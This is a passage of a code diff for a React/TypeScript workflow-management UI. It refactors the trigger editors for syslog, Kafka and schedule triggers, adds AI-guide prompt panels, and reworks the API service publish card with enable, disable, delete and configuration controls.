+  status?: JsonObject,
+  inputsText?: string,
+): CardGuideAction {
+  const kind = triggerGuideKind(trigger.type);
+  const focus = t(triggerGuideTranslationKey(kind, 'Short'));
+  return {
+    label: t('detail.run.cardGuideAction'),
+    description: t('detail.run.cardGuideTriggerDesc', { trigger: focus }),
+    displayLabel: t('detail.run.cardGuideDisplayLabel', { focus }),
+    prompt: buildCardGuidePrompt(t, workflow, focus, t(triggerGuideTranslationKey(kind, 'Instruction')), {
+      capability: 'trigger',
+      triggerType: trigger.type,
+      triggerLabel: focus,
+      trigger: {
+        id: trigger.id,
+        name: trigger.name,
+        enabled: Boolean(trigger.enabled),
+        source: trigger.source ?? {},
+        auth: sanitizeTriggerAuthForPrompt(trigger.auth),
+        mapping: trigger.mapping ?? {},
+        runtime: trigger.runtime ?? {},
+        inputs: trigger.inputs ?? {},
+        inputsText,
+      },
+      status: status ?? null,
+    }),
+  };
+}
+
+function CardGuidePanel({
+  action,
+  onGuidePrompt,
+}: {
+  action: CardGuideAction;
+  onGuidePrompt?: (prompt: string, displayLabel: string) => void;
+}) {
+  const { t } = useTranslation('workflow');
+  if (!onGuidePrompt) return null;
+  return (
+    <div className="rounded-lg border border-gray-200 bg-gray-50 px-3 py-3">
+      <div className="flex items-center justify-between gap-3">
+        <div className="flex min-w-0 items-start gap-2">
+          <span className="mt-0.5 inline-flex h-7 w-7 flex-shrink-0 items-center justify-center rounded-lg border border-gray-200 bg-white text-gray-600">
+            <Bot className="h-3.5 w-3.5" />
+          </span>
+          <div className="min-w-0">
+            <div className="text-xs font-semibold text-zinc-800">{t('detail.run.cardGuideTitle')}</div>
+            <div className="mt-0.5 text-[11px] leading-relaxed text-zinc-500">{action.description}</div>
+          </div>
+        </div>
+        <button
+          type="button"
+          onClick={() => onGuidePrompt(action.prompt, action.displayLabel)}
+          className="inline-flex h-8 flex-shrink-0 items-center gap-1.5 rounded-lg border border-gray-200 bg-white px-3 text-xs font-semibold text-gray-700 hover:border-gray-300 hover:bg-gray-50"
+        >
+          <Bot className="h-3.5 w-3.5" />
+          {action.label}
+        </button>
+      </div>
+    </div>
+  );
+}
+
+function PublishGuidePanel({
+  actions,
+  onGuidePrompt,
+  variant = 'inline',
+}: {
+  actions: PublishGuideAction[];
+  onGuidePrompt?: (prompt: string, displayLabel: string) => void;
+  variant?: 'empty' | 'inline';
+}) {
+  const { t } = useTranslation('workflow');
+  const isEmpty = variant === 'empty';
+  const hasActionButtons = Boolean(onGuidePrompt && actions.length > 0);
+
+  if (!hasActionButtons) return null;
+
+  return (
+    <div className={
+      isEmpty
+        ? 'mx-auto w-full rounded-xl border border-zinc-200 bg-white px-5 py-5 text-center shadow-sm'
+        : 'rounded-lg border border-zinc-200 bg-zinc-50/60 px-3 py-2'
+    }>
+      <div className={
+        isEmpty
+          ? 'mb-4 flex flex-col items-center gap-2'
+          : 'mb-2 flex items-start gap-2'
+      }>
+        <span className={`${isEmpty ? 'h-9 w-9' : 'mt-0.5 h-7 w-7'} inline-flex flex-shrink-0 items-center justify-center rounded-lg border border-rose-100 bg-rose-50 text-rose-500`}>
+          <Bot className="h-3.5 w-3.5" />
+        </span>
+        <div className="min-w-0">
+          <div className={`${isEmpty ? 'text-sm' : 'text-xs'} font-semibold text-zinc-800`}>
+            {t('detail.run.guidePanelTitle')}
+          </div>
+          <div className={`${isEmpty ? 'mt-1' : 'mt-0.5'} text-[11px] leading-relaxed text-zinc-500`}>
+            {t('detail.run.guidePanelDesc')}
+          </div>
+        </div>
+      </div>
+      <div
+        data-testid={isEmpty ? 'publish-guide-actions-empty' : 'publish-guide-actions-inline'}
+        className={
+          isEmpty
+            ? 'mx-auto flex w-full max-w-[360px] min-w-0 flex-col gap-2'
+            : 'flex min-w-0 flex-wrap items-center gap-1.5'
+        }
+      >
+        {actions.map((action) => (
+          <div
+            key={action.key}
+            className={`${isEmpty ? 'w-full justify-between px-3' : 'min-w-fit px-2.5'} group inline-flex h-8 items-center gap-1.5 rounded-lg border border-zinc-200 bg-white text-left text-zinc-700 transition-colors hover:border-rose-200 hover:bg-rose-50/80 hover:text-rose-600`}
+          >
+            <button
+              type="button"
+              onClick={() => onGuidePrompt?.(action.prompt, action.label)}
+              className="whitespace-nowrap text-xs font-semibold leading-none"
+            >
+              {action.label}
+            </button>
+            <GuideInfoIcon label={action.label} description={action.description} />
+          </div>
+        ))}
+      </div>
+    </div>
+  );
+}
 
 function SectionHeader({
   title,
@@ -73,6 +521,24 @@ function SectionHeader({
   );
 }
 
+function CapabilityTypePill({ children }: { children: ReactNode }) {
+  return (
+    <span className="inline-flex h-5 items-center rounded-full bg-gray-100 px-2 text-[11px] font-medium text-gray-600">
+      {children}
+    </span>
+  );
+}
+
+function EnabledStatusPill({ active }: { active: boolean }) {
+  return (
+    <span className={`inline-flex h-5 items-center rounded-full px-2 text-[11px] font-medium ${
+      active ? 'bg-green-100 text-green-700' : 'bg-gray-100 text-gray-500'
+    }`}>
+      {active ? '启用' : '停用'}
+    </span>
+  );
+}
+
 function Field({
   label,
   children,
@@ -119,6 +585,164 @@ function TextArea(props: TextareaHTMLAttributes<HTMLTextAreaElement>) {
   );
 }
 
+function SyslogTriggerFields({
+  source,
+  inputKey,
+  onSourceChange,
+  onInputKeyChange,
+}: {
+  source: JsonObject;
+  inputKey: string;
+  onSourceChange: (patch: JsonObject) => void;
+  onInputKeyChange: (key: string) => void;
+}) {
+  return (
+    <div className="grid grid-cols-1 gap-3">
+      <div className="grid grid-cols-2 gap-3">
+        <Field label="协议">
+          <Select value={String(source.protocol ?? 'udp')} onChange={(e) => onSourceChange({ protocol: e.target.value })}>
+            <option value="udp">UDP</option>
+            <option value="tcp">TCP</option>
+          </Select>
+        </Field>
+        <Field label="格式">
+          <Select value={String(source.format ?? 'auto')} onChange={(e) => onSourceChange({ format: e.target.value })}>
+            <option value="auto">auto</option>
+            <option value="rfc3164">rfc3164</option>
+            <option value="rfc5424">rfc5424</option>
+          </Select>
+        </Field>
+      </div>
+      <div className="grid grid-cols-2 gap-3">
+        <Field label="Host">
+          <Input value={String(source.host ?? '0.0.0.0')} onChange={(e) => onSourceChange({ host: e.target.value })} />
+        </Field>
+        <Field label="Port">
+          <Input
+            type="number"
+            min={1}
+            value={String(source.port ?? 5140)}
+            onChange={(e) => onSourceChange({ port: Math.max(1, Number.parseInt(e.target.value || '5140', 10)) })}
+          />
+        </Field>
+      </div>
+      <Field label="Input Key">
+        <Input value={inputKey} onChange={(e) => onInputKeyChange(e.target.value || 'syslog_message')} />
+      </Field>
+    </div>
+  );
+}
+
+function KafkaTriggerFields({
+  source,
+  inputKey,
+  onSourceChange,
+  onInputKeyChange,
+}: {
+  source: JsonObject;
+  inputKey: string;
+  onSourceChange: (patch: JsonObject) => void;
+  onInputKeyChange: (key: string) => void;
+}) {
+  return (
+    <div className="grid grid-cols-1 gap-3">
+      <div className="grid grid-cols-2 gap-3">
+        <Field label="Broker">
+          <Input value={String(source.inputBroker ?? '')} onChange={(e) => onSourceChange({ inputBroker: e.target.value })} />
+        </Field>
+        <Field label="Topic">
+          <Input value={String(source.inputTopic ?? '')} onChange={(e) => onSourceChange({ inputTopic: e.target.value })} />
+        </Field>
+      </div>
+      <div className="grid grid-cols-2 gap-3">
+        <Field label="Group ID">
+          <Input value={String(source.inputGroupId ?? '')} onChange={(e) => onSourceChange({ inputGroupId: e.target.value })} />
+        </Field>
+        <Field label="Input Key">
+          <Input value={inputKey} onChange={(e) => onInputKeyChange(e.target.value || 'kafka_message')} />
+        </Field>
+      </div>
+      <Field label="Offset Reset">
+        <Select value={String(source.autoOffsetReset ?? 'latest')} onChange={(e) => onSourceChange({ autoOffsetReset: e.target.value })}>
+          <option value="latest">latest</option>
+          <option value="earliest">earliest</option>
+        </Select>
+      </Field>
+    </div>
+  );
+}
+
+function ScheduleTriggerFields({
+  source,
+  runtime,
+  onSourceChange,
+  onRuntimeChange,
+}: {
+  source: JsonObject;
+  runtime: JsonObject;
+  onSourceChange: (patch: JsonObject) => void;
+  onRuntimeChange: (patch: JsonObject) => void;
+}) {
+  const mode = source.mode ?? (source.cron ? 'cron' : 'interval');
+  return (
+    <div className="grid grid-cols-1 gap-3">
+      <div className="grid grid-cols-2 gap-3">
+        <Field label="调度模式">
+          <Select
+            value={String(mode)}
+            onChange={(e) => {
+              const nextMode = e.target.value;
+              if (nextMode === 'cron') {
+                onSourceChange({ mode: nextMode, cron: String(source.cron ?? '*/5 * * * *'), intervalSeconds: undefined });
+                return;
+              }
+              onSourceChange({
+                mode: nextMode,
+                intervalSeconds: Math.max(1, Number.parseInt(String(source.intervalSeconds ?? 300), 10)),
+                cron: undefined,
+              });
+            }}
+          >
+            <option value="interval">Interval</option>
+            <option value="cron">Cron</option>
+          </Select>
+        </Field>
+        <Field label="执行超时（秒）">
+          <Input
+            type="number"
+            min={1}
+            value={String(runtime.timeoutSeconds ?? 7200)}
+            onChange={(e) => onRuntimeChange({ timeoutSeconds: Math.max(1, Number.parseInt(e.target.value || '7200', 10)) })}
+          />
+        </Field>
+      </div>
+      {mode === 'cron' ? (
+        <Field label="Cron 表达式">
+          <Input value={String(source.cron ?? '')} onChange={(e) => onSourceChange({ cron: e.target.value })} placeholder="*/5 * * * *" />
+        </Field>
+      ) : (
+        <Field label="轮询间隔（秒）">
+          <Input
+            type="number"
+            min={1}
+            value={String(source.intervalSeconds ?? 300)}
+            onChange={(e) => onSourceChange({ intervalSeconds: Math.max(1, Number.parseInt(e.target.value || '300', 10)) })}
+          />
+        </Field>
+      )}
+      <label className="flex items-center gap-2 text-xs text-gray-600">
+        <input
+          type="checkbox"
+          checked={Boolean(runtime.noOverlap ?? true)}
+          onChange={(e) => onRuntimeChange({ noOverlap: e.target.checked })}
+          className="rounded border-gray-300 text-red-600 focus:ring-red-500"
+        />
+        禁止重叠执行
+      </label>
+    </div>
+  );
+}
+
 function stringifyJson(value: unknown): string {
   if (!value || typeof value !== 'object' || Array.isArray(value)) {
     return DEFAULT_JSON_TEXT;
@@ -149,6 +773,10 @@ function maskedValue(value?: string, visible?: boolean): string {
   return `${value.slice(0, 4)}${'*'.repeat(Math.max(0, value.length - 8))}${value.slice(-4)}`;
 }
 
+function normalizeServiceDriver(driver?: string | null): WorkflowServiceDriver {
+  return driver === 'docker' ? 'docker' : 'local';
+}
+
 function cloneTrigger(trigger: WorkflowTrigger): WorkflowTrigger {
   return JSON.parse(JSON.stringify(trigger));
 }
@@ -297,61 +925,191 @@ function createTriggerDraft(
   };
 }
 
-function PublishSection({ workflowId }: { workflowId: string }) {
+function PublishSection({
+  workflow,
+  workflowId,
+  onGuidePrompt,
+}: {
+  workflow: Workflow;
+  workflowId: string;
+  onGuidePrompt?: (prompt: string, displayLabel: string) => void;
+}) {
   const { t } = useTranslation('workflow');
   const [expanded, setExpanded] = useState(true);
   const [service, setService] = useState<WorkflowService | null>(null);
   const [loading, setLoading] = useState(true);
   const [publishing, setPublishing] = useState(false);
   const [stopping, setStopping] = useState(false);
+  const [deleting, setDeleting] = useState(false);
   const [error, setError] = useState('');
   const [driver, setDriver] = useState<WorkflowServiceDriver>('local');
   const [apiKeyVisible, setApiKeyVisible] = useState(false);
+  const [configExpanded, setConfigExpanded] = useState(false);
+  const operationSeqRef = useRef(0);
+  const serviceDriver = service ? normalizeServiceDriver(service.driver) : null;
+  const driverChanged = Boolean(serviceDriver && driver !== serviceDriver);
+
+  const applyService = useCallback((nextService: WorkflowService | null) => {
+    setService(nextService);
+    if (nextService) {
+      setDriver(normalizeServiceDriver(nextService.driver));
+    }
+  }, []);
 
   const loadService = useCallback(async () => {
     try {
       const res = await workflowAPI.getService(workflowId);
-      setService(res.data);
-      if (res.data?.driver === 'local' || res.data?.driver === 'docker') {
-        setDriver(res.data.driver);
-      }
+      applyService(res.data);
     } catch {
-      setService(null);
+      applyService(null);
     } finally {
       setLoading(false);
     }
-  }, [workflowId]);
+  }, [applyService, workflowId]);
 
   useEffect(() => {
     loadService();
   }, [loadService]);
 
   const handlePublish = async () => {
+    const operationSeq = operationSeqRef.current + 1;
+    operationSeqRef.current = operationSeq;
     setPublishing(true);
     setError('');
     try {
       const res = await workflowAPI.publish(workflowId, { driver });
-      setService(res.data);
+      if (operationSeqRef.current === operationSeq) {
+        applyService(res.data);
+      }
     } catch (err: unknown) {
-      setError(extractErrorMessage(err, t('detail.run.publishFailed')));
+      if (operationSeqRef.current === operationSeq) {
+        setError(extractErrorMessage(err, t('detail.run.publishFailed')));
+      }
     } finally {
-      setPublishing(false);
+      if (operationSeqRef.current === operationSeq) {
+        setPublishing(false);
+      }
     }
   };
 
   const handleUnpublish = async () => {
+    const operationSeq = operationSeqRef.current + 1;
+    operationSeqRef.current = operationSeq;
+    setPublishing(false);
     setStopping(true);
     setError('');
     try {
       await workflowAPI.unpublish(workflowId);
-      await loadService();
+      if (operationSeqRef.current === operationSeq) {
+        await loadService();
+      }
+    } catch (err: unknown) {
+      if (operationSeqRef.current === operationSeq) {
+        setError(extractErrorMessage(err, t('detail.run.stopFailed')));
+      }
+    } finally {
+      if (operationSeqRef.current === operationSeq) {
+        setStopping(false);
+      }
+    }
+  };
+
+  const handleDeleteService = async () => {
+    if (!window.confirm(t('detail.run.deleteServiceConfirm'))) {
+      return;
+    }
+    const operationSeq = operationSeqRef.current + 1;
+    operationSeqRef.current = operationSeq;
+    setPublishing(false);
+    setDeleting(true);
+    setError('');
+    try {
+      await workflowAPI.deleteService(workflowId);
+      if (operationSeqRef.current === operationSeq) {
+        applyService(null);
+      }
     } catch (err: unknown) {
-      setError(extractErrorMessage(err, t('detail.run.stopFailed')));
+      if (operationSeqRef.current === operationSeq) {
+        setError(extractErrorMessage(err, t('detail.run.deleteServiceFailed')));
+      }
     } finally {
-      setStopping(false);
+      if (operationSeqRef.current === operationSeq) {
+        setDeleting(false);
+      }
     }
   };
 
+  const renderDeleteButton = () => (
+    <button
+      type="button"
+      onClick={handleDeleteService}
+      disabled={deleting || stopping || publishing}
+      aria-label={t('detail.run.deleteService')}
+      title={t('detail.run.deleteService')}
+      className={CARD_ACTION_DANGER_BUTTON_CLASS}
+    >
+      <Trash2 className="h-3.5 w-3.5" />
+      <span>{deleting ? '删除中' : '删除'}</span>
+    </button>
+  );
+
+  const renderConfigButton = () => (
+    <button
+      type="button"
+      onClick={() => setConfigExpanded((value) => !value)}
+      aria-expanded={configExpanded}
+      className={CARD_ACTION_NEUTRAL_BUTTON_CLASS}
+    >
+      {configExpanded ? <ChevronDown className="h-3.5 w-3.5" /> : <ChevronRight className="h-3.5 w-3.5" />}
+      <span>配置</span>
+    </button>
+  );
+
+  const renderDriverSelector = (options?: { showApply?: boolean }) => (
+    <div>
+      <div className="mb-2 text-xs font-medium text-zinc-500">{t('detail.run.serviceDriver')}</div>
+      <div className="flex flex-wrap items-center gap-2">
+        <div className="inline-flex rounded-lg border border-gray-200 bg-gray-50 p-0.5">
+          {(['local', 'docker'] as WorkflowServiceDriver[]).map((item) => {
+            const selected = driver === item;
+            return (
+              <button
+                key={item}
+                type="button"
+                onClick={() => setDriver(item)}
+                disabled={publishing || stopping || deleting}
+                className={`inline-flex h-8 items-center gap-2 rounded-md px-3 text-xs font-medium transition-colors disabled:cursor-not-allowed disabled:opacity-50 ${
+                  selected
+                    ? 'bg-white text-gray-900 shadow-sm'
+                    : 'text-gray-500 hover:text-gray-800'
+                }`}
+              >
+                {selected ? <Check className="h-3.5 w-3.5 text-gray-700" /> : null}
+                <span>{item === 'local' ? t('detail.run.driverLocal') : t('detail.run.driverDocker')}</span>
+              </button>
+            );
+          })}
+        </div>
+        {options?.showApply && driverChanged ? (
+          <button
+            type="button"
+            onClick={handlePublish}
+            disabled={publishing || stopping || deleting}
+            className="inline-flex h-8 items-center justify-center gap-1.5 whitespace-nowrap rounded-lg border border-gray-200 bg-white px-3 text-xs font-medium text-gray-700 hover:border-gray-300 hover:bg-gray-50 disabled:opacity-60"
+          >
+            <Rocket className="h-3.5 w-3.5" />
+            {publishing ? t('detail.run.publishing') : t('detail.run.applyDriver')}
+          </button>
+        ) : null}
+      </div>
+      <div className="mt-2 text-[11px] leading-relaxed text-zinc-500">
+        {driver === 'local' ? t('detail.run.driverLocalDesc') : t('detail.run.driverDockerDesc')}
+      </div>
+    </div>
+  );
+
+  const apiGuideAction = buildApiCardGuideAction(t, workflow, service, driver);
+
   return (
     <div className="border-b border-gray-100">
       <SectionHeader
@@ -367,78 +1125,137 @@ function PublishSection({ workflowId }: { workflowId: string }) {
               <Loader2 className="w-3.5 h-3.5 animate-spin" />
               加载中...
             </div>
-          ) : service && service.status !== 'stopped' ? (
+          ) : service ? (
             <div className="space-y-3">
-              <div className="rounded-xl border border-gray-200 bg-gray-50 px-3 py-3 space-y-3">
-                <div className="flex items-center justify-between text-xs">
-                  <span className="text-gray-500">运行方式</span>
-                  <span className="font-medium text-gray-700">
-                    {service.driver === 'docker' ? t('detail.run.driverDocker') : t('detail.run.driverLocal')}
-                  </span>
-                </div>
-                <div>
-                  <div className="text-xs text-gray-500 mb-1">Invoke URL</div>
-                  <div className="flex items-center gap-2 rounded-lg bg-white border border-gray-200 px-2 py-2">
-                    <span className="min-w-0 flex-1 truncate font-mono text-xs text-gray-700">{service.invokeUrl}</span>
-                    <CopyButton text={service.invokeUrl ?? ''} />
+              <div
+                data-testid="api-publish-card"
+                className={`rounded-xl border bg-white transition-colors ${
+                  configExpanded
+                    ? 'border-gray-300'
+                    : 'border-gray-200 hover:bg-gray-50'
+                }`}
+              >
+                <div className="grid grid-cols-1 items-center gap-4 px-4 py-4 sm:grid-cols-[minmax(0,1fr)_276px]">
+                  <button
+                    type="button"
+                    onClick={() => setConfigExpanded((value) => !value)}
+                    className="flex min-h-[82px] min-w-0 flex-col justify-between text-left"
+                  >
+                    <div>
+                      <div className="truncate text-sm font-semibold text-gray-900">API 服务</div>
+                      <div className="mt-1 truncate text-[11px] text-gray-500">
+                        {service.driver === 'docker' ? t('detail.run.driverDocker') : t('detail.run.driverLocal')}
+                      </div>
+                      <div className="mt-1 truncate text-[11px] text-gray-400">ID: api-service</div>
+                    </div>
+                    <div className="mt-3 flex flex-wrap items-center gap-2">
+                      <CapabilityTypePill>API</CapabilityTypePill>
+                      <EnabledStatusPill active={service.status !== 'stopped'} />
+                    </div>
+                  </button>
+                  <div className={CARD_ACTION_GRID_CLASS}>
+                    {renderConfigButton()}
+                    {service.status === 'stopped' ? (
+                      <button
+                        type="button"
+                        onClick={handlePublish}
+                        disabled={publishing || deleting}
+                        className={CARD_ACTION_NEUTRAL_BUTTON_CLASS}
+                      >
+                        <Play className="h-3.5 w-3.5" />
+                        {publishing ? t('detail.run.publishing') : '启用'}
+                      </button>
+                    ) : (
+                      <button
+                        type="button"
+                        onClick={handleUnpublish}
+                        disabled={stopping || deleting}
+                        className={CARD_ACTION_NEUTRAL_BUTTON_CLASS}
+                      >
+                        <Square className="h-3.5 w-3.5" />
+                        {stopping ? t('detail.run.stopping') : '停用'}
+                      </button>
+                    )}
+                    {renderDeleteButton()}
                   </div>
                 </div>
-                <div>
-                  <div className="text-xs text-gray-500 mb-1">API Key</div>
-                  <div className="flex items-center gap-2 rounded-lg bg-white border border-gray-200 px-2 py-2">
-                    <span className="min-w-0 flex-1 truncate font-mono text-xs text-gray-700">
-                      {maskedValue(service.apiKey, apiKeyVisible)}
-                    </span>
-                    <button
-                      type="button"
-                      onClick={() => setApiKeyVisible((v) => !v)}
-                      className="text-xs text-red-500 hover:text-red-700"
-                    >
-                      {apiKeyVisible ? t('detail.run.apiKeyHide') : t('detail.run.apiKeyShow')}
-                    </button>
-                    <CopyButton text={service.apiKey ?? ''} />
+                {configExpanded ? (
+                  <div data-testid="api-publish-config" className="space-y-4 border-t border-gray-100 px-4 pb-4 pt-4">
+                    {renderDriverSelector({ showApply: true })}
+                    <CardGuidePanel action={apiGuideAction} onGuidePrompt={onGuidePrompt} />
+                    <div>
+                      <div className="mb-2 text-xs font-medium text-zinc-500">Invoke URL</div>
+                      <div className="flex min-h-10 items-center gap-2 rounded-lg border border-gray-300 bg-white px-3.5 py-2">
+                        <span className="min-w-0 flex-1 truncate font-mono text-xs text-zinc-700">{service.invokeUrl}</span>
+                        <CopyButton text={service.invokeUrl ?? ''} />
+                      </div>
+                    </div>
+                    <div>
+                      <div className="mb-2 text-xs font-medium text-zinc-500">API Key</div>
+                      <div className="flex min-h-10 items-center gap-2 rounded-lg border border-gray-300 bg-white px-3.5 py-2">
+                        <span className="min-w-0 flex-1 truncate font-mono text-xs text-zinc-700">
+                          {maskedValue(service.apiKey, apiKeyVisible)}
+                        </span>
+                        <button
+                          type="button"
+                          onClick={() => setApiKeyVisible((v) => !v)}
+                          className="text-xs font-medium text-red-500 hover:text-red-700"
+                        >
+                          {apiKeyVisible ? t('detail.run.apiKeyHide') : t('detail.run.apiKeyShow')}
+                        </button>
+                        <CopyButton text={service.apiKey ?? ''} />
+                      </div>
+                    </div>
                   </div>
-                </div>
+                ) : null}
               </div>
-              <button
-                type="button"
-                onClick={handleUnpublish}
-                disabled={stopping}
-                className="w-full rounded-lg border border-red-200 px-3 py-2 text-xs font-medium text-red-600 hover:bg-red-50 disabled:opacity-60"
-              >
-                {stopping ? t('detail.run.stopping') : t('detail.run.stopService')}
-              </button>
             </div>
           ) : (
             <div className="space-y-3">
-              <p className="text-xs text-gray-500">{t('detail.run.publishDesc')}</p>
-              <div className="grid grid-cols-2 gap-2">
-                {(['local', 'docker'] as WorkflowServiceDriver[]).map((item) => (
+              <div
+                data-testid="api-publish-card"
+                className={`rounded-xl border bg-white transition-colors ${
+                  configExpanded
+                    ? 'border-gray-300'
+                    : 'border-gray-200 hover:bg-gray-50'
+                }`}
+              >
+                <div className="grid grid-cols-1 items-center gap-4 px-4 py-4 sm:grid-cols-[minmax(0,1fr)_276px]">
                   <button
-                    key={item}
                     type="button"
-                    onClick={() => setDriver(item)}
-                    className={`rounded-lg border px-3 py-2 text-left text-xs ${
-                      driver === item ? 'border-red-400 bg-red-50 text-red-700' : 'border-gray-200 hover:bg-gray-50 text-gray-600'
-                    }`}
+                    onClick={() => setConfigExpanded((value) => !value)}
+                    className="flex min-h-[82px] min-w-0 flex-col justify-between text-left"
                   >
-                    <div className="font-semibold">
-                      {item === 'local' ? t('detail.run.driverLocal') : t('detail.run.driverDocker')}
+                    <div>
+                      <div className="truncate text-sm font-semibold text-gray-900">API 服务</div>
+                      <div className="mt-1 truncate text-[11px] text-gray-500">{t('detail.run.publishDesc')}</div>
+                      <div className="mt-1 truncate text-[11px] text-gray-400">ID: api-service</div>
                     </div>
-                    <div className="mt-1 text-[11px] text-gray-500">
-                      {item === 'local' ? t('detail.run.driverLocalDesc') : t('detail.run.driverDockerDesc')}
+                    <div className="mt-3 flex flex-wrap items-center gap-2">
+                      <CapabilityTypePill>API</CapabilityTypePill>
+                      <EnabledStatusPill active={false} />
                     </div>
                   </button>
-                ))}
+                  <div className={CARD_ACTION_GRID_CLASS}>
+                    {renderConfigButton()}
+                    <button
+                      type="button"
+                      onClick={handlePublish}
+                      disabled={publishing}
+                      className={CARD_ACTION_NEUTRAL_BUTTON_CLASS}
+                    >
+                      <Rocket className="h-3.5 w-3.5" />
+                      {publishing ? t('detail.run.publishing') : '发布'}
+                    </button>
+                  </div>
+                </div>
+                {configExpanded ? (
+                  <div data-testid="api-publish-config" className="space-y-4 border-t border-gray-100 px-4 pb-4 pt-4">
+                    <CardGuidePanel action={apiGuideAction} onGuidePrompt={onGuidePrompt} />
+                    {renderDriverSelector()}
+                  </div>
+                ) : null}
               </div>
-              <button
-                type="button"
-                onClick={handlePublish}
-                disabled={publishing}
-                className="w-full rounded-lg bg-green-600 px-3 py-2 text-xs font-medium text-white hover:bg-green-700 disabled:opacity-60"
-              >
-                {publishing ? t('detail.run.publishing') : t('detail.run.publishAsApi')}
-              </button>
             </div>
           )}
           {error ? (
@@ -454,11 +1271,14 @@ function PublishSection({ workflowId }: { workflowId: string }) {
 }
 
 function TriggerEditor({
+  workflow,
   workflowId,
   draft,
   status,
   plugins,
   showIdentityHeader,
+  embedded = false,
+  onGuidePrompt,
   saving,
   deleting,
   error,
@@ -468,11 +1288,14 @@ function TriggerEditor({
   onSave,
   onRunOnce,
 }: {
+  workflow: Workflow;
   workflowId: string;
   draft: WorkflowTrigger | null;
   status?: JsonObject;
   plugins: WorkflowTriggerPlugin[];
   showIdentityHeader: boolean;
+  embedded?: boolean;
+  onGuidePrompt?: (prompt: string, displayLabel: string) => void;
   saving: boolean;
   deleting: boolean;
   error: string;
@@ -482,6 +1305,7 @@ function TriggerEditor({
   onSave: (next: WorkflowTrigger) => Promise<WorkflowTrigger | null> | void;
   onRunOnce?: () => Promise<void>;
 }) {
+  const { t } = useTranslation('workflow');
   const [inputsText, setInputsText] = useState(DEFAULT_JSON_TEXT);
   const [jsonError, setJsonError] = useState('');
   const [runningOnce, setRunningOnce] = useState(false);
@@ -573,8 +1397,10 @@ function TriggerEditor({
     return savedTrigger ?? nextDraft;
   };
 
+  const triggerGuideAction = buildTriggerCardGuideAction(t, workflow, draft, status, inputsText);
+
   return (
-    <div className="rounded-xl border border-gray-200 bg-white p-4 space-y-4">
+    <div className={embedded ? 'border-t border-gray-100 px-3 pb-3 pt-4 space-y-4' : 'rounded-xl border border-gray-200 bg-white p-4 space-y-4'}>
       {showIdentityHeader ? (
         <div className="flex items-start justify-between gap-3">
           <div className="min-w-0">
@@ -612,70 +1438,19 @@ function TriggerEditor({
         </div>
       )}
 
+      <CardGuidePanel action={triggerGuideAction} onGuidePrompt={onGuidePrompt} />
+
       <Field label="名称">
         <Input value={draft.name ?? ''} onChange={(e) => updateDraft({ name: e.target.value })} />
       </Field>
 
       {isSchedule ? (
-        <div className="grid grid-cols-1 gap-3">
-          <div className="grid grid-cols-2 gap-3">
-            <Field label="调度模式">
-              <Select
-                value={String(source.mode ?? (source.cron ? 'cron' : 'interval'))}
-                onChange={(e) => {
-                  const nextMode = e.target.value;
-                  if (nextMode === 'cron') {
-                    updateSource({
-                      mode: nextMode,
-                      cron: String(source.cron ?? '*/5 * * * *'),
-                      intervalSeconds: undefined,
-                    });
-                    return;
-                  }
-                  updateSource({
-                    mode: nextMode,
-                    intervalSeconds: Math.max(1, Number.parseInt(String(source.intervalSeconds ?? 300), 10)),
-                    cron: undefined,
-                  });
-                }}
-              >
-                <option value="interval">Interval</option>
-                <option value="cron">Cron</option>
-              </Select>
-            </Field>
-            <Field label="执行超时（秒）">
-              <Input
-                type="number"
-                min={1}
-                value={String(runtime.timeoutSeconds ?? 7200)}
-                onChange={(e) => updateRuntime({ timeoutSeconds: Math.max(1, Number.parseInt(e.target.value || '7200', 10)) })}
-              />
-            </Field>
-          </div>
-          {(source.mode ?? (source.cron ? 'cron' : 'interval')) === 'cron' ? (
-            <Field label="Cron 表达式">
-              <Input value={String(source.cron ?? '')} onChange={(e) => updateSource({ cron: e.target.value })} placeholder="*/5 * * * *" />
-            </Field>
-          ) : (
-            <Field label="轮询间隔（秒）">
-              <Input
-                type="number"
-                min={1}
-                value={String(source.intervalSeconds ?? 300)}
-                onChange={(e) => updateSource({ intervalSeconds: Math.max(1, Number.parseInt(e.target.value || '300', 10)) })}
-              />
-            </Field>
-          )}
-          <label className="flex items-center gap-2 text-xs text-gray-600">
-            <input
-              type="checkbox"
-              checked={Boolean(runtime.noOverlap ?? true)}
-              onChange={(e) => updateRuntime({ noOverlap: e.target.checked })}
-              className="rounded border-gray-300 text-red-600 focus:ring-red-500"
-            />
-            禁止重叠执行
-          </label>
-        </div>
+        <ScheduleTriggerFields
+          source={source}
+          runtime={runtime}
+          onSourceChange={updateSource}
+          onRuntimeChange={updateRuntime}
+        />
       ) : null}
 
       {isWebhook ? (
@@ -725,66 +1500,21 @@ function TriggerEditor({
       ) : null}
 
       {isKafka ? (
-        <div className="grid grid-cols-1 gap-3">
-          <div className="grid grid-cols-2 gap-3">
-            <Field label="Broker">
-              <Input value={String(source.inputBroker ?? '')} onChange={(e) => updateSource({ inputBroker: e.target.value })} />
-            </Field>
-            <Field label="Topic">
-              <Input value={String(source.inputTopic ?? '')} onChange={(e) => updateSource({ inputTopic: e.target.value })} />
-            </Field>
-          </div>
-          <div className="grid grid-cols-2 gap-3">
-            <Field label="Group ID">
-              <Input value={String(source.inputGroupId ?? '')} onChange={(e) => updateSource({ inputGroupId: e.target.value })} />
-            </Field>
-            <Field label="Input Key">
-              <Input value={inputKey} onChange={(e) => onChange(setTriggerInputKey(draft, e.target.value || 'kafka_message'))} />
-            </Field>
-          </div>
-          <Field label="Offset Reset">
-            <Select value={String(source.autoOffsetReset ?? 'latest')} onChange={(e) => updateSource({ autoOffsetReset: e.target.value })}>
-              <option value="latest">latest</option>
-              <option value="earliest">earliest</option>
-            </Select>
-          </Field>
-        </div>
+        <KafkaTriggerFields
+          source={source}
+          inputKey={inputKey}
+          onSourceChange={updateSource}
+          onInputKeyChange={(key) => onChange(setTriggerInputKey(draft, key))}
+        />
       ) : null}
 
       {isSyslog ? (
-        <div className="grid grid-cols-1 gap-3">
-          <div className="grid grid-cols-2 gap-3">
-            <Field label="协议">
-              <Select value={String(source.protocol ?? 'udp')} onChange={(e) => updateSource({ protocol: e.target.value })}>
-                <option value="udp">UDP</option>
-                <option value="tcp">TCP</option>
-              </Select>
-            </Field>
-            <Field label="格式">
-              <Select value={String(source.format ?? 'auto')} onChange={(e) => updateSource({ format: e.target.value })}>
-                <option value="auto">auto</option>
-                <option value="rfc3164">rfc3164</option>
-                <option value="rfc5424">rfc5424</option>
-              </Select>
-            </Field>
-          </div>
-          <div className="grid grid-cols-2 gap-3">
-            <Field label="Host">
